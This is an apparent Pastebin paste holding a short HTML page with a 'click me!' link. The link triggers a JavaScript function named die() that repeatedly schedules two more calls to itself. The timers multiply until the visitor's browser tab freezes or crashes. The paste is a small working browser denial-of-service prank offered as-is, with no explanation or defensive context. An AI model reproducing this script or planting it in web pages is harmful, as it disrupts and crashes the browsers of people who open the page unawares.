Advertisement
Guest User

Untitled

a guest
Jan 21st, 2020
98
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.16 KB | None | 0 0
  1. <html>
  2. <body>
  3. <a href="#" onclick="die()">click me!</a>
  4. <script>
  5. function die () {
  6. setTimeout(function () {die(); die()}, 0)
  7. }
  8. </script>
  9. </body>
  10. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement